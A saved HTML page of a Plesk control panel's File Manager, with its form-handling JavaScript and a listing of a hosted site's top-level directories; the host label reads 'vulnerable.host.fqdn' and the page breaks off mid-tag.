<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/edit/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <SPAN class="commonButton" id="bid-create-dir-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Cannot create a folder in this folder.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_create_dir" disabled id="buttonid-create-dir-disabled" type="button">Add New Directory</BUTTON><SPAN id="spanid-create-dir-disabled">Add New Directory</SPAN></SPAN>
           <SPAN class="commonButton" id="bid-create-file-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Cannot create a file in this folder.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_create_file" disabled id="buttonid-create-file-disabled" type="button">Add New File</BUTTON><SPAN id="spanid-create-file-disabled">Add New File</SPAN></SPAN>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>11 <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> items total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_anon_ftp" value="anon_ftp" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fanon_ftp%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fanon_ftp%2F" onClick=";lon();">anon_ftp</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=anon_ftp" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fanon_ftp" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_cgi-bin" value="cgi-bin" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fcgi-bin%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fcgi-bin%2F" onClick=";lon();">cgi-bin</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=cgi-bin" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fcgi-bin" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_error_docs" value="error_docs" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Ferror_docs%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Ferror_docs%2F" onClick=";lon();">error_docs</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=error_docs" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Ferror_docs" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_httpdocs" value="httpdocs" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=httpdocs" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_httpsdocs" value="httpsdocs" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpsdocs%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpsdocs%2F" onClick=";lon();">httpsdocs</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=httpsdocs" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A 